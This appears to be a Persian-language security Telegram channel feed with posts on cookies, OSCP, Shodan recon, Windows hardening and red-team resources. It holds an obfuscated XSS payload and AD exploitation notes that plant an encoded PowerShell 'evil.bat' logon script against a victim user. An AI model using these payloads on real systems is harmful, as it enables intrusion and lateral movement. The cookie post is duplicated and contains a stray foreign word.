👩💻 عملگرهای انتساب منطقی در JavaScript برای بهرهبرداری از XSS به عنوان یک مثال دیگر از اهمیت دور شدن از پیلودهای معمولی.
#bugbounty #tips
@TryHackBox
window&&=(window&&=opener||=alert)?.(1??0,)
#bugbounty #tips
@TryHackBox
❤6
🚀 پارت 4 (B)
📝 ذخیره مستقیم اطلاعات
با این حال، کوکیها فقط به یک ID محدود نیستند. برخی سرورها انتخاب میکنند که اطلاعات را مستقیماً در کوکی نگه دارند. مثال:
Cookie: name="Brian Totty"; phone="555-1212"
🎒 کوله پشتی کاربر (Cookie Jar)
مرورگر، محتوای کوکیهای ارسالی از سرور را در هدرهای Set-Cookie به خاطر میسپارد و مجموعه کوکیها را در یک فضای ذخیره سازی به نام Cookie Jar ( like یک چمدان پر از برچسب های مختلف سرورها) ذخیره می کند.
وقتی کاربر در آینده به همان سایت بازگردد، مرورگر، کوکیهای مربوط به آن سرور را انتخاب کرده و آنها را در هدر درخواست Cookie ارسال میکند.
🎯 هدف اصلی کوکیها: State Management
هدف اصلی کوکیها این است که به مرورگر اجازه میدهند مجموعهای از اطلاعات خاص یک سرور را جمع آوری کند و هر بار که کاربر آن سایت را باز میکند، این اطلاعات را به سرور ارائه دهد.
از آنجایی که وظیفه ذخیره اطلاعات کوکی بر عهده مرورگر است، به این سیستم اصطلاحاً مدیریت状态 سمت کلاینت (Client-Side State) میگویند. مشخصات رسمی کوکیها با نام HTTP State Management Mechanism شناخته میشود.
📁 مرورگرها و ذخیره سازی کوکیها
مرورگرهای مختلف، کوکیها را به روشهای مختلف ذخیره میکنند.
مرورگر Netscape Navigator کوکیها را در یک فایل متنی به نام cookies.txt ذخیره میکند.
هر خط در این فایل نشاندهنده یک کوکی است و هفت فیلد دارد که با تب از هم جدا شدهاند:
domain: دامنهای که کوکی به آن تعلق دارد.
allh: اگر TRUE باشد، به این معنی است که همه میزبانهای خاص در آن دامنه میتوانند کوکی را دریافت کنند.
path: مسیری در دامنه که با کوکی مرتبط است.
secure: اگر TRUE باشد، کوکی فقط از طریق یک اتصال SSL امن ارسال میشود.
expiration: زمان انقضای کوکی به شکل ثانیه از 1 ژانویه 1970, 00:00:00 GMT (مبدأ زمان یونیکس).
name: نام متغیر کوکی.
value: مقدار متغیر کوکی.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
📝 ذخیره مستقیم اطلاعات
با این حال، کوکیها فقط به یک ID محدود نیستند. برخی سرورها انتخاب میکنند که اطلاعات را مستقیماً در کوکی نگه دارند. مثال:
Cookie: name="Brian Totty"; phone="555-1212"
🎒 کوله پشتی کاربر (Cookie Jar)
مرورگر، محتوای کوکیهای ارسالی از سرور را در هدرهای Set-Cookie به خاطر میسپارد و مجموعه کوکیها را در یک فضای ذخیره سازی به نام Cookie Jar ( like یک چمدان پر از برچسب های مختلف سرورها) ذخیره می کند.
وقتی کاربر در آینده به همان سایت بازگردد، مرورگر، کوکیهای مربوط به آن سرور را انتخاب کرده و آنها را در هدر درخواست Cookie ارسال میکند.
🎯 هدف اصلی کوکیها: State Management
هدف اصلی کوکیها این است که به مرورگر اجازه میدهند مجموعهای از اطلاعات خاص یک سرور را جمع آوری کند و هر بار که کاربر آن سایت را باز میکند، این اطلاعات را به سرور ارائه دهد.
از آنجایی که وظیفه ذخیره اطلاعات کوکی بر عهده مرورگر است، به این سیستم اصطلاحاً مدیریت状态 سمت کلاینت (Client-Side State) میگویند. مشخصات رسمی کوکیها با نام HTTP State Management Mechanism شناخته میشود.
📁 مرورگرها و ذخیره سازی کوکیها
مرورگرهای مختلف، کوکیها را به روشهای مختلف ذخیره میکنند.
مرورگر Netscape Navigator کوکیها را در یک فایل متنی به نام cookies.txt ذخیره میکند.
هر خط در این فایل نشاندهنده یک کوکی است و هفت فیلد دارد که با تب از هم جدا شدهاند:
domain: دامنهای که کوکی به آن تعلق دارد.
allh: اگر TRUE باشد، به این معنی است که همه میزبانهای خاص در آن دامنه میتوانند کوکی را دریافت کنند.
path: مسیری در دامنه که با کوکی مرتبط است.
secure: اگر TRUE باشد، کوکی فقط از طریق یک اتصال SSL امن ارسال میشود.
expiration: زمان انقضای کوکی به شکل ثانیه از 1 ژانویه 1970, 00:00:00 GMT (مبدأ زمان یونیکس).
name: نام متغیر کوکی.
value: مقدار متغیر کوکی.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
👍4❤1
OSCP Study Tips to Help You Succeed THB.pdf
466.9 KB
⭕ ۹ نکته مطالعه OSCP برای کمک به موفقیت شما توسط OffSec
@TryHackBox | Github | YouTube | Group
#OSCP #OffSec
@TryHackBox | Github | YouTube | Group
#OSCP #OffSec
👍8❤2
Top 10 Most Dangerous Active Directory Attack Methods.pdf
1.4 MB
✏️ مقاله تالیف شده
Top 10 Most Dangerous Active Directory Attack Methods
📚برخی از سرفصل ها
📗بخش اول: Active Directory (AD)
📕بخش دوم: توضیح ۱۰ مورد از خطرناکترین روش حمله به Active Directory
به همراه معرفی ابزار های هر مورد
📘بخش سوم : راهبردهای جامع برای افزایش امنیت Active Directory
🔖بخش چهارم : ساخت یک دفاع مقاوم در برابر حملات Active Directory
✍️نویسنده
@TryHackBox | The Chaos
#AD #Acrive_Directory #Cybersecurity
Top 10 Most Dangerous Active Directory Attack Methods
📚برخی از سرفصل ها
📗بخش اول: Active Directory (AD)
📕بخش دوم: توضیح ۱۰ مورد از خطرناکترین روش حمله به Active Directory
به همراه معرفی ابزار های هر مورد
📘بخش سوم : راهبردهای جامع برای افزایش امنیت Active Directory
🔖بخش چهارم : ساخت یک دفاع مقاوم در برابر حملات Active Directory
✍️نویسنده
@TryHackBox | The Chaos
#AD #Acrive_Directory #Cybersecurity
❤11👍3
Forwarded from
⭕ یادداشت های اکسپلویت از تست نفوذ Active Directory - بخش دوم
3. آپلود داده های جمعآوری شده (Upload Collected Data)
پس از اجرا، فایلهای نتیجه (*.json) در دایرکتوری فعلی تولید می شوند. تمام این فایلهای JSON را به BloodHound در مرورگر وب آپلود کنید.
میتوانیم روابط در Active Directory را کاوش کنیم.
بررسی (Investigation)
فهرست همه کاربران
فهرست همه گروهها
فهرست سیاست رمز عبور
بازیابی اطلاعات در مورد دامنه داده شده.
تغییر رمز عبور کاربر AD
سوءاستفاده از اسکریپت ورود برای کاربران دیگر (Abuse Logon Script for Other Users)
اگر کاربر فعلی مجوز نوشتن اسکریپت ها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت ورود کاربران دیگر را تغییر دهیم.
1. بررسی مجوز
2. تغییر/اضافه کردن یک اسکریپت مخرب
3. تنظیم اسکریپت ورود برای کاربر مشخصشده
هنگامی که کاربر دیگر وارد سیستم می شود، اسکریپت .bat اجرا خواهد شد.
#NoteADExploit
@KavehAPT
3. آپلود داده های جمعآوری شده (Upload Collected Data)
پس از اجرا، فایلهای نتیجه (*.json) در دایرکتوری فعلی تولید می شوند. تمام این فایلهای JSON را به BloodHound در مرورگر وب آپلود کنید.
میتوانیم روابط در Active Directory را کاوش کنیم.
بررسی (Investigation)
فهرست همه کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
فهرست همه گروهها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
فهرست سیاست رمز عبور
net accounts /domain
# فهرست اشیاء AD
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
بازیابی اطلاعات در مورد دامنه داده شده.
Get-ADDomain -Server dc.example.com
تغییر رمز عبور کاربر AD
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL
یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره می کند.
dir \\dc.example.com\SYSVOL\
سوءاستفاده از اسکریپت ورود برای کاربران دیگر (Abuse Logon Script for Other Users)
اگر کاربر فعلی مجوز نوشتن اسکریپت ها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت ورود کاربران دیگر را تغییر دهیم.
1. بررسی مجوز
icacls C:\Windows\SYSVOL\sysvol\example.local\noscripts\
2. تغییر/اضافه کردن یک اسکریپت مخرب
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\noscripts\evil.bat
3. تنظیم اسکریپت ورود برای کاربر مشخصشده
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\noscripts\evil.bat
هنگامی که کاربر دیگر وارد سیستم می شود، اسکریپت .bat اجرا خواهد شد.
#NoteADExploit
@KavehAPT
❤7
✨ سلام به همه دوستان خوبم -✨
🔒 متأسفانه کانال قبلی ما توسط تلگرام بسته شد، اما خبر خوب اینه که دوباره با قدرت بیشتر و محتوای جذابتر برگشتیم!
اینجا قراره دوباره شروع کنیم:
✅ آموزشهای حرفهای هک و امنیت (کاملاً قانونی و آموزشی)
✅ نکات و مطالب برنامهنویسی
✅ دورههای آموزشی ارزشمند
✅ طنزهای خفن کامپیوتری برای لحظات فان 😎
🔥 ما تازه شروع کردیم و قراره خیلی سورپرایز داشته باشیم...
اگه میخوای اولین نفر باشی که محتوای جدید رو میبینه، همین الان عضو شو 👇
ارادتمند شما - سجاد تیموری
🆔 @Sajjad_Teymouri
🔒 متأسفانه کانال قبلی ما توسط تلگرام بسته شد، اما خبر خوب اینه که دوباره با قدرت بیشتر و محتوای جذابتر برگشتیم!
اینجا قراره دوباره شروع کنیم:
✅ آموزشهای حرفهای هک و امنیت (کاملاً قانونی و آموزشی)
✅ نکات و مطالب برنامهنویسی
✅ دورههای آموزشی ارزشمند
✅ طنزهای خفن کامپیوتری برای لحظات فان 😎
🔥 ما تازه شروع کردیم و قراره خیلی سورپرایز داشته باشیم...
اگه میخوای اولین نفر باشی که محتوای جدید رو میبینه، همین الان عضو شو 👇
ارادتمند شما - سجاد تیموری
🆔 @Sajjad_Teymouri
❤6🔥1
🔖 مجموعهای از کوئری های Shodan که میتوان در جریان Reconnaissance (مرحله شناسایی) استفاده کرد:
فیلتر بر اساس سازمان:
فیلتر بر اساس فرم های ورود (Login Pages):
فیلتر بر اساس هاست هایی که از گواهی های SSL موردنظر استفاده می کنند:
فیلتر بر اساس وبسرور Apache:
فیلتر بر اساس هاست های مرتبط با نود تارگت از طریق هش (favicon hash):
#recon #tips
@TryHackBox
فیلتر بر اساس سازمان:
org:"Example"
فیلتر بر اساس فرم های ورود (Login Pages):
http.noscript:"Login"
فیلتر بر اساس هاست هایی که از گواهی های SSL موردنظر استفاده می کنند:
ssl:"example\.com" || ssl.cert.subject.cn:"example\.com"
فیلتر بر اساس وبسرور Apache:
server:"Apache"
فیلتر بر اساس هاست های مرتبط با نود تارگت از طریق هش (favicon hash):
http.favicon.hash:0123456789
#recon #tips
@TryHackBox
❤8
🔖 تقویت امن و مطمئن ویندوز با استفاده از روشهای رسمی مایکروسافت و راهنماهای جامع:
یک ریپازیتوری کاربردی برای هکرهای اخلاقی
اگر حفظ حریم خصوصی براتون مهمه، هر سیستمی که روی اون کار می کنید باید شخصی سازی بشه. هدف این ریپازیتوری دقیقاً همینه کمک به شما برای پیکربندی فقط ابزارها و قابلیت هایی که مایکروسافت در ویندوز پیاده سازی کرده، تا بتونید امنیت رو به حداکثر برسونید و دسترسیها رو محدود کنید؛ اون هم با استفاده از روشهای مستند، پشتیبانی شده، توصیه شده و رسمی
👩💻 گیتهاب & سایت
@TryHackBox
#امنیت
یک ریپازیتوری کاربردی برای هکرهای اخلاقی
اگر حفظ حریم خصوصی براتون مهمه، هر سیستمی که روی اون کار می کنید باید شخصی سازی بشه. هدف این ریپازیتوری دقیقاً همینه کمک به شما برای پیکربندی فقط ابزارها و قابلیت هایی که مایکروسافت در ویندوز پیاده سازی کرده، تا بتونید امنیت رو به حداکثر برسونید و دسترسیها رو محدود کنید؛ اون هم با استفاده از روشهای مستند، پشتیبانی شده، توصیه شده و رسمی
Install-Module -Name 'Harden-Windows-Security-Module' -Force
👩💻 گیتهاب & سایت
@TryHackBox
#امنیت
❤5
Forwarded from P.F.K Security
مهندسی معکوس از Kaspersky Lab
بهتازگی تیمِ «مرکز جهانی تحقیقات و تحلیل تهدیدات» ابزار جدیدی به نام hrtng را با جامعه به اشتراک گذاشته است. این ابزارپلاگین برای IDA Proro است که روند مهندسی معکوس نمونه های پیچیده را ساده و قابلمدیریت تر میکند.
دقیقاً چگونه؟ در این راهنما بخوانید راهنمایی عملی که تحلیل یک مؤلفه از بدافزار جاسFinSpypy را نمایش می دهد و چند نکتهٔ کلی و کاربردی برای کار با IDA ارائه می کند.
https://securelist.com/hrtng-ida-pro-plugin/114780/
#reverse #practice
@PfkSecurity
بهتازگی تیمِ «مرکز جهانی تحقیقات و تحلیل تهدیدات» ابزار جدیدی به نام hrtng را با جامعه به اشتراک گذاشته است. این ابزارپلاگین برای IDA Proro است که روند مهندسی معکوس نمونه های پیچیده را ساده و قابلمدیریت تر میکند.
دقیقاً چگونه؟ در این راهنما بخوانید راهنمایی عملی که تحلیل یک مؤلفه از بدافزار جاسFinSpypy را نمایش می دهد و چند نکتهٔ کلی و کاربردی برای کار با IDA ارائه می کند.
https://securelist.com/hrtng-ida-pro-plugin/114780/
#reverse #practice
@PfkSecurity
ابزار PwnFox افزونه ای برای Firefox/Burp Suite که ابزارهای مفیدی برای یک باگ هانتر فراهم می کند:
✅ راهاندازی BurpProxy با یک کلیک
✅ پروفایلهای Container برای استفاده از چند حساب کاربری در یک مرورگر
✅ ثبت (لاگ) پیامهای PostMessage
✅ جعبهابزار (Toolbox) و ابزارهای دیگر
این autochrome چیزی مشابه برای Chrome (یا Chromium).
@TryHackBox #BugBounty #Tools
✅ راهاندازی BurpProxy با یک کلیک
✅ پروفایلهای Container برای استفاده از چند حساب کاربری در یک مرورگر
✅ ثبت (لاگ) پیامهای PostMessage
✅ جعبهابزار (Toolbox) و ابزارهای دیگر
این autochrome چیزی مشابه برای Chrome (یا Chromium).
@TryHackBox #BugBounty #Tools
🔥8❤4
همکاری با تیم امنیتی ما
ما در حال عضو گیری هستیم یک تیم پویا و نوپا در حوزه ردتیم و تست نفوذ هستیم که بر روی عملیات ردتیم (Red Team)، تست نفوذ، تولید محتوای آموزشی پیشرفته و توسعه ابزارهای امنیتی تمرکز دارد. هدف ما ارائه خدمات مشاورهای و آموزشهای عملی و خلق محتوای جذاب برای جامعه امنیتی است.
اگر علاقهمند به پیوستن به تیمی هستید این فرصت را از دست ندهید!
موقعیت های مورد نیاز:
1. مدرسین حوزه تست نفوذ (وب و شبکه و مهندسی معکوس و انالیز بدافزار و امنیت شبکه و مدرسین حوزه های شبکه و برنامه نویسی ) .
2. ادمینهای تولید محتوا (اینستاگرام، تلگرام و سایر پلتفرم ها) .
> اولویت با افراد تازه کار فعال و با انرژی هست .
> توانایی ساخت پست های جذاب که آموزش داده می شود.
3. تیم پادکست
> اولویت با افراد تازه کار فعال و با انرژی هست .
> مسئولیت ضبط و تدوین پادکست های امنیتی.
> برگزاری لایوهای تعاملی با موضوعات روز امنیتی.
4. محققان امنیتی (Security Researchers)
> تمرکز بر کشف آسیبپذیری های جدید Zero-Day Research
> انتشار مقالات فنی و تحقیقات .
5. کارآموزان و تازه واردان به حوزه امنیت
> فرصت یادگیری در کنار تیم ما
> آموزش گام به گام تست نفوذ
6. مترجمان برای کتابهای تخصصی و مقالات
> ترجمه کتاب های تخصصی و مقالات و کتابچه های امنیتی
چرا به ما بپیوندید؟
کار در یک تیم جوان و نوآور با فضایی پویا و چالشبرانگیز.
دسترسی به منابع آموزشی برای رشد حرفهای.
چگونه اقدام کنیم؟
رزومه ، نمونه کارها (مقالات، پستهای آموزشی، کدهای GitHub و ...) و هرگونه سوال را به آدرس زیر ارسال کنید.
⭕ پیام به پشتیبانی:
🆔 @ThbxSupport
ما منتظر استعدادهای پرانرژی مثل شما هستیم! 🔥
ما در حال عضو گیری هستیم یک تیم پویا و نوپا در حوزه ردتیم و تست نفوذ هستیم که بر روی عملیات ردتیم (Red Team)، تست نفوذ، تولید محتوای آموزشی پیشرفته و توسعه ابزارهای امنیتی تمرکز دارد. هدف ما ارائه خدمات مشاورهای و آموزشهای عملی و خلق محتوای جذاب برای جامعه امنیتی است.
اگر علاقهمند به پیوستن به تیمی هستید این فرصت را از دست ندهید!
موقعیت های مورد نیاز:
1. مدرسین حوزه تست نفوذ (وب و شبکه و مهندسی معکوس و انالیز بدافزار و امنیت شبکه و مدرسین حوزه های شبکه و برنامه نویسی ) .
2. ادمینهای تولید محتوا (اینستاگرام، تلگرام و سایر پلتفرم ها) .
> اولویت با افراد تازه کار فعال و با انرژی هست .
> توانایی ساخت پست های جذاب که آموزش داده می شود.
3. تیم پادکست
> اولویت با افراد تازه کار فعال و با انرژی هست .
> مسئولیت ضبط و تدوین پادکست های امنیتی.
> برگزاری لایوهای تعاملی با موضوعات روز امنیتی.
4. محققان امنیتی (Security Researchers)
> تمرکز بر کشف آسیبپذیری های جدید Zero-Day Research
> انتشار مقالات فنی و تحقیقات .
5. کارآموزان و تازه واردان به حوزه امنیت
> فرصت یادگیری در کنار تیم ما
> آموزش گام به گام تست نفوذ
6. مترجمان برای کتابهای تخصصی و مقالات
> ترجمه کتاب های تخصصی و مقالات و کتابچه های امنیتی
چرا به ما بپیوندید؟
کار در یک تیم جوان و نوآور با فضایی پویا و چالشبرانگیز.
دسترسی به منابع آموزشی برای رشد حرفهای.
چگونه اقدام کنیم؟
رزومه ، نمونه کارها (مقالات، پستهای آموزشی، کدهای GitHub و ...) و هرگونه سوال را به آدرس زیر ارسال کنید.
⭕ پیام به پشتیبانی:
🆔 @ThbxSupport
ما منتظر استعدادهای پرانرژی مثل شما هستیم! 🔥
👍9❤1
💡 وقتی برنامهای را در ترمینال یا از طریق SSH اجرا می کنید، آن برنامه به محض پایان جلسه ترمینال یا قطع شدن اتصال، خاتمه می یابد.
برای جلوگیری از این مسئله و نگه داشتن برنامه و تمام پروسس های آن در حال اجرا، از دستور nohup استفاده کنید. این دستور تمام سیگنال های پایان جلسه را نادیده میگیرد و اجازه می دهد پروسس حتی اگر جلسه ترمینال قطع شود، به کار خود ادامه دهد.
دستور nohup همچنین فایلی به نام nohup.out ایجاد می کند تا خروجی دستور را ذخیره کند.
به عنوان جایگزین، می توانید از tmux/disown/screen استفاده کنید.
#linux #tips
@TryHackBox
برای جلوگیری از این مسئله و نگه داشتن برنامه و تمام پروسس های آن در حال اجرا، از دستور nohup استفاده کنید. این دستور تمام سیگنال های پایان جلسه را نادیده میگیرد و اجازه می دهد پروسس حتی اگر جلسه ترمینال قطع شود، به کار خود ادامه دهد.
دستور nohup همچنین فایلی به نام nohup.out ایجاد می کند تا خروجی دستور را ذخیره کند.
$ cat nohup.out
به عنوان جایگزین، می توانید از tmux/disown/screen استفاده کنید.
#linux #tips
@TryHackBox
👍7❤2
Windows important DLLs.pdf
486.8 KB
🔐 موضوع DLLهای مهم ویندوز در امنیت سایبری
تحلیل شده توسط Arash Narimanpour
مطالعهای ارزشمند از Arash Narimanpour درباره DLLهای مهم ویندوز و نقششان در امنیت سیستم. اگر میخواید بفهمید چه فایلهای DLL ممکنه مورد سوءاستفاده قرار بگیرن یا نقطه ضعف باشند، این پست رو از دست ندید.
👤 نویسندهها:
* Arash Narimanpour
* Mohammad-Hosein Aliyari
* آقای علیاری
⚙️ چرا این موضوع اهمیت داره؟
* در واقع DLLها بخش جداییناپذیر از عملکرد ویندوز هستند و بارگذاری ماژولهایی که برنامهها برای اجرا به آنها نیاز دارند.
* برخی DLLها میتونن به درهای پشتی بدل بشن یا در پروسس های injection مورد استفاده قرار بگیرن.
* شناخت دقیق اینکه چه DLLهایی معمولاً در حملات بهرهبرداری میشن، کمک میکنه تا در شناسایی رفتار مخرب و جلوگیری از نفوذ سریعتر عمل کنیم.
✍️ تهیه شده توسط
@TryHackBox | The Chaos
#Windows #DLL #CyberSecurity
تحلیل شده توسط Arash Narimanpour
مطالعهای ارزشمند از Arash Narimanpour درباره DLLهای مهم ویندوز و نقششان در امنیت سیستم. اگر میخواید بفهمید چه فایلهای DLL ممکنه مورد سوءاستفاده قرار بگیرن یا نقطه ضعف باشند، این پست رو از دست ندید.
👤 نویسندهها:
* Arash Narimanpour
* Mohammad-Hosein Aliyari
* آقای علیاری
⚙️ چرا این موضوع اهمیت داره؟
* در واقع DLLها بخش جداییناپذیر از عملکرد ویندوز هستند و بارگذاری ماژولهایی که برنامهها برای اجرا به آنها نیاز دارند.
* برخی DLLها میتونن به درهای پشتی بدل بشن یا در پروسس های injection مورد استفاده قرار بگیرن.
* شناخت دقیق اینکه چه DLLهایی معمولاً در حملات بهرهبرداری میشن، کمک میکنه تا در شناسایی رفتار مخرب و جلوگیری از نفوذ سریعتر عمل کنیم.
✍️ تهیه شده توسط
@TryHackBox | The Chaos
#Windows #DLL #CyberSecurity
👍11❤5
Windows Process Injection in 2019 THB.pdf
2.9 MB
این مقاله به بررسی تکنیک های تزریق پروسس در ویندوز میپردازه، که یکی از روش های رایج بدافزارها برای پنهان کاری و دور زدن ابزارهای امنیتی مثل آنتیویروس، DLP (Data Loss Prevention) و فایروالهاست. تزریق پروسس یعنی کد مخرب رو داخل یک پروسس قانونی (مثل explorer.exe) اجرا کنی بدون اینکه فرآیند جدیدی بسازی ...
منبع
@TryHackBox | Github | YouTube | Group
#Windows #Process #Injection
منبع
@TryHackBox | Github | YouTube | Group
#Windows #Process #Injection
👍7🔥2👌1
Forwarded from Try Hack Box
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport